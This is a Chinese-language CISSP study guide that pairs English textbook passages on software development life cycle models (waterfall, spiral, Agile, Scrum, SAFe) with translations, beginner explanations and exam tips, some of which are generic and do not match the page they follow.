考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 18 / PDF P1341

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

that verifies the software is working properly and security testing that verifies there are no unaddressed significant security issues. Once developers are satisfied that the code works properly, the process moves into user acceptance testing (UAT), where users verify that the code meets their requirements and formally accept it as ready to move into production use. Once this phase is complete, the code may move to deployment. As with any critical development process, it's important that you maintain a copy of the written test plan and test results for future review.

Maintenance and Change Management Once a system is operational, a variety of maintenance tasks are necessary to ensure continued operation in the face of changing operational, data processing, storage, and environmental requirements. It's essential that you have a skilled support team in place to handle any routine or unexpected maintenance.

It's also important that any changes to the code be handled through a formalized change management process, as described in Chapter 1, “Security Governance Through Principles and Policies.” Life Cycle Models One of the major complaints you'll hear from practitioners of the more established engineering disciplines (such as civil, mechanical, and electrical engineering) is that software engineering is not an engineering discipline at all. In fact, they contend, it's simply a combination of chaotic processes that somehow manage to scrape out workable solutions from time to time.

Indeed, some of the “software engineering” that takes place in today's development environments is nothing but bootstrap coding held together by “duct tape and chicken wire.” However, the adoption of more formalized life cycle management processes is seen in mainstream software engineering as the industry matures. After all, it's hardly fair to compare the processes of a centuries-old discipline such as civil engineering to those of an industry that's still in its first century of existence. In the 1970s and 1980s, pioneers like Winston Royce and Barry Boehm proposed several software development life cycle (SDLC) models to help guide the practice toward formalized processes.

In 1991, the Software Engineering Institute published the Capability Maturity Model, which described the process that organizations undertake as they move toward

中文直译 / 整理

以验证软件正常运行,以及安全测试以验证不存在未解决的重大安全问题。 一旦开发人员确认代码正常工作,流程将进入用户验收测试(UAT),在此阶 段用户验证代码是否满足其需求,并正式接受其进入生产环境。 此阶段完成后,代码可进入部署阶段。 与任何关键开发流程一样,保留书面测 试计划和测试结果的副本以供将来审查至关重要。 维护与变更管理 系统投入运行后,为应对不断变化的操作、数据处理、存储和环境需求,必须 执行多种维护任务。 您必须配备一支技术熟练的支持团队,以处理任何常规或 突发的维护工作。 同时,任何代码变更都应通过正式的变更管理流程进行处理, 如第1章“通过原则与政策实现安全治理”中所述。 生命周期模型 您经常会听到来自更成熟工程学科(如土木、机械和电气工程)从业者的主要 抱怨,即软件工程根本算不上一门工程学科。 事实上,他们认为,软件工程不 过是若干混乱流程的组合,偶尔才能勉强产出可用的解决方案。 的确,当今开 发环境中一些所谓的“软件工程”不过是用“胶带和铁丝”勉强拼凑起来的原 始编码。 然而,随着行业的成熟,主流软件工程界普遍认为应采用更正式的生命周期管 理流程。

毕竟,将已有数百年历史的土木工程等学科的流程,与一个仍处于其 第一个世纪的行业进行比较,显然不公平。 在20世纪70年代和80年代,先驱如 温斯顿·罗伊斯和巴里·博姆提出了几种软件开发生命周期(SDLC)模型,以帮 助引导实践走向正式化流程。 1991年,软件工程研究所发布了能力成熟度模型, 该模型描述了组织在向

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

政策:政策是高层原则,说明必须遵守什么。

软件开发生命周期:SDLC 把需求、设计、开发、测试、部署和维护串起来。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

Policy 高层、强制、稳定;Procedure 具体步骤。

安全越早进入 SDLC,修复成本越低。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
政策 政策是高层原则,说明必须遵守什么。
软件开发生命周期 SDLC 把需求、设计、开发、测试、部署和维护串起来。
学习单元 19 / PDF P1342

第 1342 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

incorporating solid engineering principles into their software development processes. In the following sections, we'll take a look at the work produced by these studies. Having a management model in place should improve the resultant products. However, if the SDLC methodology is inadequate, the project may fail to meet business and user needs. Thus, it is important to verify that the SDLC model is properly implemented and is appropriate for your environment. Furthermore, one of the initial steps of implementing an SDLC should include management approval. Choosing an SDLC model is normally the work of software development teams and their leadership.

Cybersecurity professionals should ensure that security principles are interwoven into the implementation of whatever model(s) the organization uses for software development. Waterfall Model Originally developed by Winston Royce in 1970, the waterfall model seeks to view the systems development life cycle as a series of sequential activities. The traditional waterfall model has seven stages of development. As each stage is completed, the project moves into the next stage. The original, traditional waterfall model was a simple design that was intended to be sequential steps from inception to conclusion.

In practical application, the waterfall model, of necessity, evolved to a more modern model. As illustrated by the backward arrows in Figure 20.3, the iterative waterfall model does allow development to return to the previous phase to correct defects discovered during the subsequent phase. This is often known as the feedback loop characteristic of the waterfall model.

中文直译 / 整理

在其软件开发流程中融入坚实工程原则的过程中所采取的步骤。 在接下来的章 节中,我们将考察这些研究的成果。 建立管理模型应能提升最终产品的质量。 然而,如果SDLC方法论不够完善,项目可能无法满足业务和用户需求。 因此, 验证SDLC模型是否得到正确实施并适合您的环境至关重要。 此外,实施 SDLC的初始步骤之一应包括管理层的批准。 选择SDLC模型通常是软件开发团队及其领导层的工作。 网络安全专业人员 应确保安全原则贯穿于组织所使用的任何开发模型的实施过程中。 瀑布模型 由温斯顿·罗伊斯于1970年最初提出,瀑布模型试图将系统开发生命周期视为一 系列顺序活动。 传统的瀑布模型包含七个开发阶段。 每个阶段完成后,项目便 进入下一阶段。 最初的传统瀑布模型是一种简单的设计,旨在从开始到结束依 次进行各步骤。 在实际应用中,瀑布模型不可避免地演变为更现代的模型。 如 图20.3中的反向箭头所示,迭代式瀑布模型允许在后续阶段发现缺陷时返回前 一阶段进行修正。 这通常被称为反馈循环特性的瀑布模型。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

软件开发生命周期:SDLC 把需求、设计、开发、测试、部署和维护串起来。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1342 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

安全越早进入 SDLC,修复成本越低。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
软件开发生命周期 SDLC 把需求、设计、开发、测试、部署和维护串起来。
学习单元 20 / PDF P1343

第 1343 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 20.3 The iterative life cycle model with feedback loop The waterfall model was one of the first comprehensive attempts to model the software development process while taking into account the necessity of returning to previous phases to correct system faults. However, one of the major criticisms of this model is that it allows the developers to step back only one phase in the process. It does not make provisions for the discovery of errors at a later phase in the development cycle.

中文直译 / 整理

图 20.3 带反馈循环的迭代生命周期模型 瀑布模型是最早全面尝试模拟软件开发过程的模型之一,同时考虑了返回前 一阶段以修正系统缺陷的必要性。 然而,该模型的主要批评之一是它仅允许 开发人员回退一个阶段。 它并未为在开发周期后期发现错误提供相应的机制。

小白解释

场景先行:你是公司的安全负责人,正在读第 1343 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1343 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 21 / PDF P1344

第 1344 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The waterfall model was improved by adding validation and verification steps to each phase. Verification evaluates the product against specifications, whereas validation evaluates how well the product satisfies real-world requirements. The improved model was labeled the modified waterfall model. However, it did not gain widespread use before the spiral model dominated the project management scene. Spiral Model In 1988, Barry Boehm of TRW proposed an alternative life cycle model that allows for multiple iterations of a waterfall-style process. Figure 20.4 illustrates this model.

Because the spiral model encapsulates a number of iterations of another model (the waterfall model), it is known as a metamodel, or a “model of models.” Notice that each “loop” of the spiral results in the development of a new system prototype (represented by P1, P2, and P3 in Figure 20.4). Theoretically, system developers would apply the entire waterfall process to the development of each prototype, thereby incrementally working toward a mature system that incorporates all the functional requirements in a fully validated fashion.

Boehm's spiral model provides a solution to the major criticism of the waterfall model—it allows developers to return to the planning stages as changing technical demands and customer requirements necessitate the evolution of a system. The waterfall model focuses on a largescale effort to deliver a finished system, whereas the spiral model focuses on iterating through a series of increasingly “finished” prototypes that allow for enhanced quality control.

中文直译 / 整理

瀑布模型通过在每个阶段添加验证和确认步骤得到了改进。 验证评估产 品是否符合规范,而确认则评估产品满足现实需求的程度。 改进后的模型被 称为修改后的瀑布模型。 然而,在螺旋模型主导项目管理领域之前,它并未 得到广泛应用。 螺旋模型 1988年,TRW的Barry Boehm提出了一种替代的生命周期模型,该模型允 许对瀑布式过程进行多次迭代。 图20.4展示了该模型。 由于螺旋模型封装了 另一个模型(瀑布模型)的多次迭代,因此它被称为元模型,或“模型的模 型”。 请注意,螺旋的每个“循环”都会产生一个新的系统原型(在图20.4中用P1、 P2和P3表示)。 理论上,系统开发人员会对每个原型应用整个瀑布流程,从而 逐步推进,最终形成一个成熟系统,以完全验证的方式整合所有功能需求。 Boehm的螺旋模型解决了瀑布模型的主要批评——它允许开发人员在技术需求 和客户要求发生变化、需要演进系统时,返回到规划阶段。 瀑布模型侧重于大 规模努力交付一个完整的系统,而螺旋模型则侧重于迭代一系列越来越“完善” 的原型,以实现更优的质量控制。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1344 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 22 / PDF P1345

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

FIGURE 20.4 The spiral life cycle mode Agile Software Development More recently, the Agile model of software development has gained popularity within the software engineering community. Beginning in the mid- 1990s, developers increasingly embraced approaches to software development that eschewed the rigid models of the past in favor of approaches that placed an emphasis on the needs of the customer and on quickly developing new functionality that meets those needs in an iterative fashion.

Seventeen pioneers of the Agile development approach got together in 2001 and produced a document titled Manifesto for Agile Software Development (http://agilemanifesto.org) that states the core philosophy of the Agile approach:

中文直译 / 整理

图 20.4 螺旋生命周期模型 敏捷软件开发 近年来,敏捷软件开发模型在软件工程界日益流行。 自20世纪90年代中期以来, 开发人员越来越多地采用摒弃过去僵化模型的方法,转而强调客户需求,并以 迭代方式快速开发满足这些需求的新功能。 2001年,十七位敏捷开发方法的先驱聚在一起,制定了一份题为敏捷软件开 发宣言(http://agilemanifesto.org)的文件,阐述了敏捷方法的核心理念:

小白解释

场景先行:你是公司的安全负责人,正在读第 1345 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 23 / PDF P1346

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

We are uncovering better ways of developing software by doing it and helping others do it. Through this work we have come to value: Individuals and interactions over processes and tools Working software over comprehensive documentation Customer collaboration over contract negotiation Responding to change over following a plan That is, while there is value in the items on the right, we value the items on the left more. The Agile Manifesto also defines 12 principles that underlie the philosophy, which are available here: http://agilemanifesto.org/principles.

The 12 principles, as stated in the Agile Manifesto, are as follows: Our highest priority is to satisfy the customer through early and continuous delivery of valuable software. Welcome changing requirements, even late in development. Agile processes harness change for the customer's competitive advantage. Deliver working software frequently, from a couple of weeks to a couple of months, with a preference to the shorter timescale. Business people and developers must work together daily throughout the project. Build projects around motivated individuals. Give them the environment and support they need, and trust them to get the job done.

The most efficient and effective method of conveying information to and within a development team is face-to-face conversation. Working software is the primary measure of progress. Agile processes promote sustainable development. The sponsors, developers, and users should be able to maintain a constant pace indefinitely. Continuous attention to technical excellence and good design enhances agility. Simplicity—the art of maximizing the amount of work not done—is essential.

中文直译 / 整理

我们通过实践并帮助他人实践,不断发现更好的软件开发方法。 通过这些 工作,我们形成了以下价值观: 个体与互动 胜过流程和工具 可工作的软件 胜过详尽的文档 客户协作 胜过合同谈判 应对变化 胜过遵循计划 也就是说,尽管右侧的项目也有价值,但我们更重视左侧的项目。 《敏捷宣言》还定义了12条原则,这些原则是该理念的基础,详情请见: http://agilemanifesto.org/principles。 敏捷宣言中提出的12项原则如下: 我们的最高优先级是通过早期和持续交付有价值的软件来满足客户。 欢迎需求变化,即使在开发后期也是如此。 敏捷过程利用变化为客户创 造竞争优势。 频繁交付可工作的软件,周期从几周到几个月不等,更倾向于较短的周期。 业务人员和开发人员必须在整个项目中每天紧密合作。 围绕有动力的个人构建项目。 为他们提供所需的环境和支持,并信任他们能够 完成工作。 向开发团队传递信息以及团队内部沟通最有效和最有效的方法是面对面的交流。 可工作的软件是衡量进展的主要标准。 敏捷流程促进可持续发展。 赞助商、开发人员和用户应能长期保持 稳定的速度。 持续关注技术卓越和良好设计有助于提升敏捷性。

简洁——最大化未做工作量的艺术——是至关重要的。

小白解释

场景先行:你是公司的安全负责人,正在读第 1346 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
学习单元 24 / PDF P1347

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

The best architectures, requirements, and designs emerge from selforganizing teams. At regular intervals, the team reflects on how to become more effective, then tunes and adjusts its behavior accordingly. Today, most software developers embrace the flexibility and customer focus of the Agile approach to software development, and it is quickly becoming the philosophy of choice for developers. In an Agile approach, the team embraces the principles of the Agile Manifesto and meets regularly to review and plan their work. It's important to note, however, that Agile is a philosophy and not a specific methodology.

Several specific methodologies have emerged that take these Agile principles and define specific processes that implement them. These include Scrum, Kanban, Lean, Rapid Application Development (RAD), Agile Unified Process (AUP), the Dynamic Systems Development Model (DSDM), and Extreme Programming (XP). Of these, the Scrum approach is the most popular. Scrum takes its name from the daily team meetings, called scrums, that are its hallmark. Each day the team gets together for a short meeting, where they discuss the contributions made by each team member, plan the next day's work, and work to clear any impediments to their progress.

These meetings are led by the project's scrum master, an individual in a project management role who is responsible for helping the team move forward and meet their objectives. The Scrum methodology organizes work into short sprints of activity. These are well-defined periods of time, typically between one and four weeks, where the team focuses on achieving short-term objectives that contribute to the broader goals of the project. At the beginning of each sprint, the team gathers to plan the work that will be conducted during each sprint. At the end of the sprint, the team should have a fully functioning product that could be released, even if it does not yet meet all user requirements.

Each subsequent sprint introduces new functionality into the product.

中文直译 / 整理

最佳的架构、需求和设计源于自组织团队。 团队会定期反思如何提高效率,然后相应地调整和优化其行为。 如今,大多数软件开发人员都接受了敏捷软件开发方法的灵活性和以客户为中 心的理念,这种方法正迅速成为开发者的首选哲学。 在敏捷方法中,团队秉持 敏捷宣言的原则,并定期召开会议审查和规划工作。 然而,需要注意的是,敏捷是一种哲学,而非具体的 methodology。 已经出 现了几种具体的方法,它们采纳了这些敏捷原则,并定义了实施这些原则的 具体流程。 这些方法包括 Scrum、Kanban、Lean、快速应用开发(RAD)、 敏捷统一过程(AUP)、动态系统开发模型(DSDM)和极限编程(XP)。 在这些方法中,Scrum 方法最为流行。 Scrum 得名于其标志性特征——每日团 队会议,称为 scrums。 每天,团队都会召开简短会议,讨论每位成员的贡献, 规划次日的工作,并清除阻碍进展的障碍。 这些会议由项目的 scrummaster 主 持,该角色是一名承担项目管理职责的人员,负责帮助团队前进并实现目标。 Scrum 方法将工作组织成短周期的 冲刺。

这些是定义明确的时间段,通常为一 到四周,在此期间团队专注于实现有助于项目整体目标的短期目标。 在每次冲 刺开始时,团队会聚集在一起规划将在该次冲刺中进行的工作。 在冲刺结束时, 团队应交付一个功能完备、可发布的产品,即使它尚未满足所有用户需求。 每 个后续冲刺都会为产品引入新功能。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 25 / PDF P1348

第 1348 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Integrated Product Teams Although the Agile concept is a product of recent years, the idea of bringing together stakeholders for software and system development is a long-standing concept. The Department of Defense introduced the idea of integrated product teams (IPTs) in 1995 as an approach to bring together multifunctional teams with a single goal of delivering a product or developing a process or policy.

In the guidance creating IPTs, the Defense Department said that “IPTs are set up to foster parallel, rather than sequential, decisions and to guarantee that all aspects of the product, process, or policy are considered throughout the development process.” Scaled Agile Framework (SAFe) The Scaled Agile Framework (SAFe) is a comprehensive approach to applying agile principles and practices at the enterprise scale. Recognizing the complexities that larger organizations face, SAFe offers a structured framework to facilitate the use of Agile across multiple teams, often coordinating the efforts of hundreds or even thousands of practitioners.

At its core, SAFe seeks to provide a shared understanding of how work flows through an organization, ensuring alignment from team-level activities to strategic goals. SAFe is organized into four configuration levels: 1. Essential SAFe: This is where the traditional Agile practices, like Scrum, come into play. Teams work in Agile Release Trains (ARTs), which are groups of teams that align to deliver larger pieces of value, often in the form of program increments. Each program increment typically lasts around 8–12 weeks. 2.

Large Solution SAFe: For particularly vast systems that require multiple ARTs, this SAFe configuration provides additional roles and artifacts to ensure alignment and coordination. This isn't always needed but comes into play in exceptionally large implementations. 3. Portfolio SAFe: This SAFe configuration is where strategic direction is translated into actionable items. Investment themes guide the organization's work, ensuring alignment with business objectives. Lean Portfolio Management (LPM) principles drive the efforts, ensuring minimal overhead and focusing on delivering the maximum value.

中文直译 / 整理

集成产品团队 尽管敏捷概念是近年来的产物,但将利益相关者聚集在一起进行软件和系 统开发的思想由来已久。 美国国防部于1995年提出了综合产品团队(I PTs)的概念,作为一种将多职能团队聚集在一起、以单一目标交付产品或 开发流程或政策的方法。 在制定IPTs的指导方针时,国防部表示:"IPTs旨 在促进并行而非顺序的决策,并确保在整个开发过程中考虑产品、流程或 政策的所有方面。 " 规模化敏捷框架(SAFe) 规模化敏捷框架(SAFe) 是一种在企业规模上应用敏捷原则和实践的综合方法。 鉴于大型组织面临的复杂性,SAFe 提供了一个结构化的框架,以促进多个团 队之间的敏捷协作,通常协调数百甚至数千名从业者的工作。 在核心层面,SAFe 旨在提供对工作如何在组织中流动的共同理解,确保从团 队级活动到战略目标的对齐。 SAFe 分为四个配置层级: 1. EssentialSAFe: 这里涉及传统的敏捷实践,如 Scrum。 团队在敏捷发 布列车(ARTs)中工作,ARTs 是一组对齐以交付更大价值单元的团队, 通常以程序增量的形式呈现。 每个程序增量通常持续约 8–12 周。

2. LargeSolutionSAFe: 对于需要多个 ARTs 的特别庞大的系统,此 SAFe 配置提供了额外的角色和工件,以确保对齐与协调。 这并非总是必需, 但在特别大规模的实施中会发挥作用。 3. PortfolioSAFe: 此 SAFe 配置将战略方向转化为可执行事项。 投资主 题指导组织的工作,确保与业务目标保持一致。 精益投资组合管理( LPM)原则驱动这些努力,确保最小的开销并专注于交付最大价值。

小白解释

场景先行:你是公司的安全负责人,正在读第 1348 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1348 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
学习单元 26 / PDF P1349

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

4. Full SAFe: Full SAFe includes all elements of Essential, Large Solution, and Portfolio SAFe, along with additional guidance to help organizations achieve business agility. It's designed to support enterprises that build and maintain large, integrated solutions that require hundreds of practitioners to collaborate effectively. One of the standout features of SAFe is its emphasis on aligning business goals with development activity. It introduces concepts like Epic, Capability, Feature, and Story, to break down and categorize tasks, ensuring every piece of work can be traced back to a larger objective.

SAFe Principles The SAFe framework is based on 10 core principles drawn from Agile philosophy: 1. Take an economic view. 2. Apply systems thinking. 3. Assume variability; preserve options. 4. Build incrementally with fast, integrated learning cycles. 5. Base milestones on objective evaluation of working systems. 6. Make value flow without interruptions. 7. Apply cadence; synchronize with cross-domain planning. 8. Unlock the intrinsic motivation of knowledge workers. 9. Decentralize decision-making. 10. Organize around value. SAFe offers a comprehensive and modular approach to scaling Agile, accommodating the intricacies of larger organizations.

It integrates principles from multiple disciplines to provide a holistic method of managing work, ensuring alignment from the strategic level right down to individual teams. While its complexity might not be suitable for every organization, those with the need for structured coordination across large teams often find immense value in its practices. 4.

中文直译 / 整理

完整的SAFe:完整的SAFe包含Essential、Large Solution和 Portfolio SAFe的所有元素,以及帮助组织实现业务敏捷性的额外指导。 它 旨在支持构建和维护大型集成解决方案的企业,这些解决方案需要数百名从 业者有效协作。 SAFe 的一个突出特点是强调将业务目标与开发活动对齐。 它引入了史诗、能 力、特性和故事等概念,以分解和分类任务,确保每一项工作都能追溯到更 大的目标。 SAFe原则 SAFe框架基于源自敏捷哲学的10项核心原则: 1. 采取经济视角。 2. 应用系统思维。 3. 假设多样性; 保留选项。 4. 通过快速的集成学习周期进行增量构建。 5. 基于对可运行系统的客观评估设定里程碑。 6. 让价值流畅地持续流动,避免中断。 7. 应用节奏; 与跨领域规划同步。 8. 激发知识工作者的内在动力。 9. 去中心化决策。 10. 围绕价值进行组织。 SAFe 提供了一种全面且模块化的敏捷扩展方法,以适应大型组织的复杂性。 它整合了多个学科的原则,提供了一种从战略层面到单个团队全面协调工作的 方法。

尽管其复杂性可能并不适合每个组织,但那些需要在大型团队间进行结 构化协调的组织通常能从中获得巨大价值。

小白解释

场景先行:你是公司的安全负责人,正在读第 1349 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

